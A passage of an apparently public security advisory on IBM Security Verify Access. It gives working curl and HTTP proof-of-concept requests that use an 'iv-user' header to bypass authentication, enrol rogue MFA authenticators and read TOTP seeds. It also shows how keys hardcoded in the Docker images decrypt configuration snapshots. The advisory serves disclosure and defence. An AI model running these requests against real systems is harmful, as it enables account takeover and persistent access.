in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE). \n\nThe vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets. \n\nOther issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment). \n\nCommunication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched. \n\nSecurity bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported. \n\nIt appears that some CVEs are still missing. \n\nFinally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_ in the report sent to IBM) that was confirmed **not** to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE. \n\n_Impacts_\n\nAn attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nRegarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities. \n\nWhen the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins. \n\nThis vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\u003e \n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications\n\nNote that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations. \n\n_Recommendations_\n\n- - Apply security patches. \n- - Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance. \n- - Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)). \n- - Flag any additional authenticator added to an account as suspicious. \n- - Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance. \n\n\nShodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM\u0027s security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:\n\n- - https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024\n- - https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024\n- - https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024\n\n\n\n## Details - Authentication Bypass on IBM Security Verify Runtime\n\nIt is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance. \n\nThe threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance). \n\nThe IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn... \n\nThe different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header `iv-user: target-user` (e.g. `iv-user: admin`) in the HTTPS requests. \n\nAdding an additional HTTP header `iv-user: target-user` when querying the APIs will provide a complete control over the `target-user`. \n\nThere is a HTTPs server reachable on port 443/tcp providing APIs:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nUsually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as `easuser`, as shown below:\n\nDocumentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:\n\n\u003e Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface\n\u003e \n\u003e Certificate authentication\n\u003e\n\u003e Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e\n\u003e User ID and password authentication\n\u003e\n\u003e Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e The default username is easuser and the default password is passw0rd. \n\n\nAttack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (`easuser`). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nNote that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs. \n\nAccording to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the `/mga/sps/*` path. Actually, the `/mga/` route seems to be managed by WebSEAL servers while the `/sps/*` routes are managed by the runtime docker instance. \n\nWithout authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the `/sps/oauth/oauth20/authorize?client_id=ClientID\u0026response_type=code\u0026scope=mmfaAuthn` API endpoint and specifying which target user to compromise using the additional HTTP header `iv-user: target-user`. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) for the `target-user` user. \n\nBy specifying the HTTP header `iv-user: target-user`, an attacker can interact with all the APIs located in `/sps/*` for any user, without authentication. \n\nListing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA. \n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . \n {\n \"result\": \"FBTRBA306E The user management operation failed because the user is not authenticated.\"\n }\n\nListing of authenticators for the `target-user` - with `iv-user` HTTP header (without session cookies nor specific credentials):\n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n [\n {\n \"device_name\": \"Iphone 13 Pro Max\",\n \"oauth_grant\": \"uuida71[REDACTED]\",\n \"auth_methods\": [],\n \"os_version\": \"13\",\n \"device_type\": \"[REDACTED]\",\n \"id\": \"uuid20[REDACTED]\",\n \"enabled\": true\n },\n {\n \"device_name\": \"Iphone 13 Pro Max\",\n \"oauth_grant\": \"uuida71[REDACTED]\",\n \"auth_methods\": [],\n \"os_version\": \"13\",\n \"device_type\": \"[REDACTED]\",\n \"id\": \"uuid20[REDACTED]\",\n \"enabled\": true\n },\n [...]\n kali% \n\nIt is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying `iv-user: target-user` in the HTTP header:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nA PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user `target-user`. Note that the `client_id` variable must be edited as we use the specific TestAuthenticatorClient client identifier. \nThe valid `client_id` variable can be retrieved from the `/sps/mga/user/mgmt/grant` API:\n\n kali% curl -kv -H \"iv-user: target-user\" https://test-runtime/sps/mga/user/mgmt/grant | jq . \n {\n \"grants\": [\n {\n \"id\": \"uuida71[REDACTED]\",\n \"isEnabled\": true,\n \"clientId\": \"TestAuthenticatorClient\",\n [...]\n\nI suggest using the specific `client_id` identifier configured in the targeted instance. The correct `client_id` identifier can also be obtained by visiting `https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`. The `device_selection.html` webpage is just a front-end to get access to several APIs:\n\n- - /sps/mga/user/mgmt/grant\n- - /sps/mmfa/user/mgmt/authenticators\n- - /sps/fido2/registrations\n- - /sps/mga/user/mgmt/device \n- - /sps/apiauthsvc/policy/u2f_register\n- - /sps/mga/user/mgmt/clients\n- - ... \n\nFor example, visiting a remote IBM Security Verify Runtime instance at`https://url/sps/mga/user/mgmt/html/device/device_selection.html` without an `iv-user: target-user` HTTP header will return empty information (since the resulting requests sent to APIs are not \"authenticated\"):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nVisiting the same address `https://url/sps/mga/user/mgmt/html/device/device_selection.html` using Burp Suite Pro, and (i) adding a HTTP Header `iv-user: target-user` in all the resulting HTTP requests and (ii) rewriting the URL from `^\\/mga\\/sps\\/` to `\\/sps\\/` (since the `/mga/` path is hardcoded in JavaScript code) will now provide a full access for the `target-user` (adding an authenticator, deleting an authenticator, adding passkeys, ...). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nAn attacker can also add an new authenticator for any user using curl:\n\nPoC:\n\n kali% curl -kv \"https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn\" -H \"iv-user: target-user\" \n * Host test-runtime:443 was resolved. \n * IPv6: (none)\n * IPv4: 10.0.0.15\n * Trying 10.0.0.15:443... \n * Connected to test-runtime (10.0.0.15) port 443\n * using HTTP/1.x\n \u003e GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn HTTP/1.1\n \u003e Host: test-runtime\n \u003e User-Agent: curl/8.5.0\n \u003e Accept: */*\n \u003e iv-user: target-user\n \u003e \n \u003c HTTP/1.1 302 Found\n \u003c X-Frame-Options: SAMEORIGIN\n \u003c Pragma: no-cache\n \u003c Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\n \u003c Content-Language: en-US\n \u003c Transfer-Encoding: chunked\n \u003c Date: Sat, 07 Sep 2024 12:07:21 GMT\n \u003c Expires: Thu, 01 Dec 1994 16:00:00 GMT\n \u003c Cache-Control: no-store, no-cache=set-cookie\n \u003c \n * Connection #0 to host test-runtime left intact\n \nThe resulting secret `code` provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) corresponding to the `target-user`. \n\nIn order to import this secret token inside an IBM Verify Security application (an authenticator), we can:\n\n- - reach the `https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y` webpage (without `/mga` at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from `/mga/sps/` to `/sps/`; or\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n- - reach the `/sps/mmfa/user/mgmt/qr_code/json` API to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code (note that in the next HTTP answer, the `ignoreSslCerts=true` is not the default option); or\n\n\u003cpre\u003e\nGET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient HTTP/1.1\nHost: test-runtime\niv-user: target-user\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\nHTTP/1.1 200 OK\nContent-Type: application/json\nX-Frame-Options: SAMEORIGIN\nPragma: no-cache\nContent-Language: en-US\nConnection: Close\nDate: Sat, 07 Sep 2024 20:39:55 GMT\nExpires: Thu, 01 Dec 1994 16:00:00 GMT\nCache-Control: no-store, no-cache=set-cookie\nContent-Length: 202\n\n{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=true\",\n\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\n\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\n\u003c/pre\u003e\n\n- - reach the `/mga/sps/mmfa/user/mgmt/qr_code/json` API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-faced WebSEAL servers) to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code; or\n\n- - simply locally generate the QR code containing the JSON data as shown below using the `qrencode` program:\n\n\u003cpre\u003e\n kali% qrencode -o picture.png \u0027{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=false\",\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\u0027\n\u003c/pre\u003e\n\nThen the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) in order to enroll a new device. By default, the specific `https://enroll-url/mga/sps/mmfa/user/mgmt/details` is always reachable from the Internet in order to successfully enroll smartphones. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) has been used and successfully enrolled for the `target-user` and can now be used to authenticate as `target-user`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe device has been correctly enrolled from the Internet as shown below, by using the `/sps/mmfa/user/mgmt/authenticators` API without authentication. \n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n [\n {\n \"device_name\": \"Samsung S22\",\n \"oauth_grant\": \"uuida72253ef[REDACTED]\",\n \"auth_methods\": [\n {\n \"key_handle\": \"32e[REDACTED].userPresence\",\n \"id\": \"uuidb694[REDACTED]\",\n \"type\": \"user_presence\",\n \"enabled\": true,\n \"algorithm\": \"SHA256withRSA\"\n }\n ],\n \"os_version\": \"13\",\n \"device_type\": \"[REMOVED]\",\n \"id\": \"uuidb4fde[REDACTED]\",\n \"enabled\": true\n },\n [...]\n\n\nFurthermore, all the APIs in `/sps/*` are directly reachable by specifying the HTTP header `iv-user: target-user`. \n\nWe can also list the secret key for the seed corresponding to OTP:\n\n kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H \"iv-user: target-user\" | jq . \n { \n \"period\": \"30\",\n \"secretKeyUrl\": \"otpauth://totp/Example:target-user\"?secret=NSJ[REDACTED][REDACTED][REDACTED]\u0026issuer=Example\",\n \"secretKey\": \"NSJ[REDACTED][REDACTED][REDACTED]\",\n \"digits\": \"6\",\n \"username\": \"target-user\",\n \"algorithm\": \"HmacSHA1\"\n }\n\n\nAll the APIs located in `/sps/` are vulnerable to this authentication bypass. \n\nAs shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user. \n\nAn attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user. \n\nAt the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected. \n\nThe latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is **strongly recommended** to implement this authentication mechanism and not to expose the ISVA runtime instance to the network. \n\n**Without this optional authentication, any malicous actor (i) with access to WebSEAL servers (with a shell or a SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with a shell access to any \u0027trusted\u0027 machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials**. \n\nRegarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:\n\n- - From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\n- From my understanding, this vulnerability is not going to be patched (no security bulletin was published and no CVE has been assigned, ticket has been closed as solved) because, according to the official recommendations, it is the customer\u0027s responsability to filter any communication to the runtime instance. This present security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture. \n\nAbout the detection of insecure instances, a HTTPS request to the `/sps/` route providing the banner `Server: IBM Security Verify Access` in the HTTPS answer will allow SOC team to detect an instance. The banner will not appear when reaching `https://test-runtime/`). If MFA is used, a HTTP request to `/sps/mga/user/mgmt/html/device/device_selection.html` (port `443` or `9443`, by default) will allow SOC team to detect an insecure ISVA runtime instance. An answer indicating `200 OK` with the content of the `device_selection.html` webpage will indicate that the tested instance is probably insecure:\n\n kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html\n [...]\n \u003c HTTP/1.1 200 OK\n \u003c X-Frame-Options: SAMEORIGIN\n \u003c Server: IBM Security Verify Access\n \u003c Content-Type: text/html;charset=UTF-8\n [...]\n \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n \u003chtml\u003e\n \n \u003chead\u003e\n \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"\u003e\n \u003ctitle\u003eDevice Selection\u003c/title\u003e\n \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/static/design.css\"\u003e\u003c/link\u003e\n \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/mga/user/mgmt/html/device/device_selection.css\"\u003e\u003c/link\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/mgmt_msg.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/static/u2fI18n.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/common.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/device/device_selection.js\"\u003e\u003c/script\u003e\n\nOn a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting `https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`. If `device_selection.html` is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the `device_selection.html` webpage available in official IBM Docker images) and the previous `/mga/sps/` APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker that enrolled a rogue authenticator to a compromised account can get persistence access from the Internet even if the runtime instance is not reachable anymore or if the \"regular\" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-faced enrolling server will allow the attackers to enroll new authenticators and retrieve current seeds. \n\nFurthermore, with Internet-faced servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite big. \n\nIt is also possible to list the target version of a Internet-faced instance (proxifed through WebSEAL) by visiting the `/mga/sps/mmfa/user/mgmt/details` API (when MFA is enabled in ISVA):\n\n curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . \n {\n \"authntrxn_endpoint\": \"https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending\",\n \"metadata\": {\n \"service_name\": \"Organisation\",\n \"qrlogin_endpoint\": \"https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response\"\n [...]\n \"enrollment_endpoint\": \"https://info.domain.tld/scim/Me\",\n [...]\n \"version\": \"10.0.8.0\",\n [...]\n }\n\n\n\n## Details - Reuse of snapshot private keys\n\nThe official Docker images have been retrieved and analyzed on a local machine:\n\n kali-docker# docker images\n REPOSITORY TAG IMAGE ID CREATED SIZE\n ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB\n ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB\n ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB\n ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB\n kali-docker# docker save 498e181d7395 \u003e ibmcom/verify-access-runtime.tar\n kali-docker# docker save c0003aca743c \u003e ibmcom/verify-access-wrp.tar\n kali-docker# docker save 206efdd7809c \u003e ibmcom/verify-access.tar\n kali-docker# docker save 959f6f1095e9 \u003e ibmcom/verify-access-dsc.tar\n\nIt was observed that instances contain custom encryption/decryption keys (`device_key.kdb` and `device_key.sth` files) located inside `/var/.ca/`. \n\nThese keys are used by the `isva_decrypt` utility present in all the images. For example, the `/usr/sbin/bootstrap.sh` script will decrypt the stored openldap.zip file using `isva_decrypt`:\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n [...]\n # Decrypt and extract the LDAP configuration. \n isva_decrypt $snapshot_tmp_dir/openldap.zip\n\n unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n [...]\n\nWhen doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (`device_key.kdb` and `device_key.sth`) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:\n\n kali-docker# ls -la */*/var/.ca/* \n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n -rw------- 1 root root 5991 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n -rw------- 1 root root 193 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n \n kali-docker# sha256sum */*/var/.ca/*|sort|uniq\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n\nUsing these keys and the `IBM Crypto for C` programs, we can successfully decrypt the `openldap.zip` file - an encrypted zip file - available inside the `default.snapshot` file - this file contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The `openldap.zip` file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using `isva_decrypt`, it is required to create a `/var/.ca` directory containing `device_key.kdb` and `device_key.sth` in a test machine):\n\n kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip\n [...]\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"2s\\0\\0etc/openldap/schema/nis.ldif\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\321\\0\\0etc/openldap/schema/collectiv\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\0etc/openldap/slapd-replica.conf\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"data/secAuthority-default/__db.0\"..., iov_len=1024}], 2) = 1024\n read(4, \"\\271=b\\223\\205\\320\\277\\365\\207\\302#T\\255\\355\\374Ct\\222\\332M`3%\\341\\361I\\301\\233j\\34\\1\\355\"..., 8191) = 1124\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"PK\\1\\2\\36\\3\\24\\0\\0\\0\\10\\0\\4Z-UQ\\202\\212\u003cV\\2\\0\\0\\0 \\0\\0000\\0\\30\\0\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, 